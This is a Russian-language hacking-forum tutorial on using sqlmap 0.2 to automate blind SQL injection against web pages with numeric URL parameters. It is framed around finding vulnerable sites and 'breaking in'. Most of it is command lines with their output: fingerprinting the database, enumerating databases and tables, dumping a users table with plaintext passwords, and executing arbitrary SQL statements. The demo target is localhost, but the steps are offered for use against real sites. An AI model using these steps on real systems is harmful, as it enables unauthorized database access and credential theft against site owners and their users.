SQLMap 0.2 (мануал) — HackZona.Ru

SQLMap 0.2 (мануал)

SQLMap 0.2 (мануал)

Тип статьи:
Со старой ХакЗоны.
Источник:
//прошу простить меня за повторное отправление данной статьи. увы, в начале я //не указал имя автора. да и было несколько недочетов ибо я только //регистрировался
//и не успел ознакомится со всем. впредь такого не повторится. и также если вы //посчитайте нужным разместить мою скромную статью то прошу вас удалить //строки которые я помитиел символом комментария://.


Программа предназначена для автоматизации blind SQL Injection. Скачать ее можно отсюда. Скачали?
Теперь разархивируем его. Еси вам не знакомо расширение ру то спокойно!!! Это не зверь:))) Просто это программа написанная на относительно новом языке програмирования Питон (Python). Запускать нужно программу sqlmap.py. Чтобы запустить её нужно просто перекинуть ее в cmd. Для тех кто не знает. Чтобы запустить cmd нуно нажать на Start-->Run-->cmd. Запустили? Молодцы:)) Теперь чтобы юзать ее нуно опять кинуть прогу в cmd (или нажать на кнопку «вверх» если цмдм не закрывали) и набрать команду например h что опять таки приведет список всех команд данной проги. Итак разобрались с этой частью? Идём вперед.
Хотел бы разачаровать всех ламеров потому что уязвимость вместо вас прога искать не будет. Уязвимый сай нужно сначала найти самому и только потом начать юзать прогу. Ну допустим сайт мы нашли например localhost/articles.php?id=1&cat=2. Допустим что нефильтруемая переменная это id. Нужные параметры для успешного взлома это:
-u localhost/blind/showcontent.php?id=TOKEN&cat=2
-t TOKEN
-d 1
Итак начнем:
--BANNER GRABBING:
[503] [email protected]:sqlmap/ => python2.4 ./sqlmap.py -u «localhost/blind/showcontent.php?id=TOKEN&cat=2» -t TOKEN -d 1 --banner

sqlmap() v0.1 coded by belch <[email protected]>


[*] starting at: 12:53:21

remote DBMS: MySQL

banner: '4.1.15-Debian_1ubuntu5-log'

[*] shutting down at: 12:53:22




--CURRENT USER:
[505] [email protected]:sqlmap/ => python2.4 ./sqlmap.py -u «localhost/blind/showcontent.php?id=TOKEN&cat=2» -t TOKEN -d 1 --current-user
sqlmap() v0.1 coded by belch <[email protected]>


[*] starting at: 02:01:01

remote DBMS: MySQL

current user: '[email protected]'

[*] shutting down at: 02:01:01


--CURRENT DATABASE
[506] [email protected]:sqlmap/ => python2.4 ./sqlmap.py -u «localhost/blind/showcontent.php?id=TOKEN&cat=2» -t TOKEN -d 1 --current-database

sqlmap() v0.1 coded by belch <[email protected]>


[*] starting at: 02:01:28

remote DBMS: MySQL

current database: 'blind'

[*] shutting down at: 02:01:28


--AVAILABLE PRESENT DBS
[509] [email protected]:sqlmap/ => python2.4 ./sqlmap.py -u «localhost/blind/showcontent.php?id=TOKEN&cat=2» -t TOKEN -d 1 --get-dbs
sqlmap() v0.1 coded by belch <[email protected]>


[*] starting at: 02:02:22

remote DBMS: MySQL

available database:

[*] information_schema
[*] blind
[*] mysql
[*] test

[*] shutting down at: 02:02:25


Дамп таблицы
Теперь давайте сделаем дамп таблицы. (db:blind).
Давайте достанем имена таблиц в db 'blind':

[510] [email protected]:sqlmap/ => python2.4 ./sqlmap.py -u «localhost/blind/showcontent.php?id=TOKEN&cat=2» -t TOKEN -d 1 --database blind --get-tables

sqlmap() v0.1 coded by belch <[email protected]>


[*] starting at: 02:03:20

remote DBMS: MySQL

-----------------------------
DATABASE: blind
-----------------------------
news
users
-----------------------------


[*] shutting down at: 02:03:21





DUMP OF 'news' table:

[511] [email protected]:sqlmap/ => python2.4 ./sqlmap.py -u «localhost/blind/showcontent.php?id=TOKEN&cat=2» -t TOKEN -d 1 --database blind --table news --dump

sqlmap() v0.1 coded by belch <[email protected]>


[*] starting at: 02:03:41

remote DBMS: MySQL

DATABASE: blind TABLE: news
-------------------------------------------------------------------------------------------------
|news |id |highlight
-------------------------------------------------------------------------------------------------
|ciao da daniele |1 |numero 1
|sempre ciao da daniele |2 |numero 2
|sempre sempre ciao da daniele |3 |numero 3
-------------------------------------------------------------------------------------------------

[*] shutting down at: 02:03:47



DUMP OF 'users' table:
[512] [email protected]:sqlmap/ => python2.4 ./sqlmap.py -u «localhost/blind/showcontent.php?id=TOKEN&cat=2» -t TOKEN -d 1 --database blind --table users --dump

sqlmap() v0.1 coded by belch <[email protected]>


[*] starting at: 02:04:05

remote DBMS: MySQL

DATABASE: blind TABLE: users
-------------------------------------
|username |password |id
-------------------------------------
|daniele |bellucci |1
|mancinelli |mancio |2
-------------------------------------

[*] shutting down at: 02:04:08


--ESECUZIONE SINGOLI STATEMENT:
[518] [email protected]:sqlmap/ => python2.4 ./sqlmap.py -u «localhost/blind/showcontent.php?id=TOKEN&cat=2» -t TOKEN -d 1 -e «select version()»

sqlmap() v0.1 coded by belch <[email protected]>


[*] starting at: 02:06:15

remote DBMS: MySQL

select version(): '5.0.22-Debian_0ubuntu6.06-log'

None
[*] shutting down at: 02:06:16


При написании этой статьи был использован файл README в архиве. Хотел бы так же сказать чтобы сделать иньекцию при помощи данной прогу в уязвимом саёте обе переменные должны быть диманическими т.е числовыми. Например прога заработает только если URL такой:
localhost/articles.php?id=1&cat=2
Если он будет такой:
localhost/articles.php?id=news&cat=2 то прога не заработает выдав эрор что параметр news не динамический.
Нравится
Не нравится

1 комментарий

13:39
Неплохо весьма. Хотелось бы узнать нет ли тут програмеров по питону?